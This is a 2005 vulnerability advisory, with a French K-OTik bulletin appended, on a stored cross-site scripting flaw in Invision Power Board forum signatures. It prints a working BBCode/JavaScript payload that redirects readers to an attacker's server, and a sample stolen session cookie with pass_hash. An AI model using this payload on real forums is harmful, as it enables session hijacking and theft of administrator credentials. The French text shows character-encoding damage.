Invision Power Board v2.0.3 XSS vulnerabilities

2005-03-31T00:00:00
ID SECURITYVULNS:DOC:8191
Type securityvulns
Reporter Securityvulns
Modified 2005-03-31T00:00:00

Description

Invision Power Board v2.0.3 XSS vulnerabilities found more at user signature. when Admin read attacker topics, admin will lost his pass_hash

example [session_id=f2600ff71ea895e6b9dedb5fd9480d16;%20member_id=48;%20pass_hash=8ee00894ca583f64a85fd41a47048d14;%20topicsread=a%3A7%3A%7Bi%3A498%3Bi%3A1111649756%3Bi%3A485%3Bi%3A1111649822%3Bi%3A494%3Bi%3A1111651530%3Bi%3A488%3Bi%3A1111653254%3Bi%3A481%3Bi%3A1111655869%3Bi%3A490%3Bi%3A1111654241%3Bi%3A250%3Bi%3A1111655785%3B%7D;%20modtids=%2C;%20anonlogin=-1]

I post this topic because v2.0.3 also get bugs not only 1.3.1 and all atacker can hack by this code

exploit [COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.servermalicieux.com');")

Viethacker.org Hoangyenxinhdep - dora


Date de Publication : 2005-02-21 © K-OTik.COM - Voir Notice Lйgale
Titre: Invision Power Board SML Codes Cross Site Scripting Vulnerability K-OTik ID : AVIS-2005-0191 Risque : Bas Exploitable а distance : Oui Exploitable en local : Oui

  • Description Technique *

Une vulnйrabilitй a йtй identifiйe dans Invision Power Board, elle pourrait кtre exploitйe par un attaquant afin de rйaliser des attaques par Cross Site Scripting. Le problиme rйsulte d'une erreur prйsente au niveau de la gestion des signatures qui ne sont pas correctement filtrйes, ce qui pourrait кtre exploitй afin d'injection du code HTML cotй client via une signature spйcifique.

[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.servermalicieux.com');")

  • Versions Vulnйrables *

Invision Power Board version 1.3.1 et infйrieures

  • Solution *

Aucune solution officielle pour l'instant

  • Rйfйrences *

http://www.k-otik.com/bugtraq/bulletins/937

  • Crйdit *

Vulnйrabilitйs dйcouvertes par Daniel A.

  • ChangeLog *

2005-02-21 : Version Initiale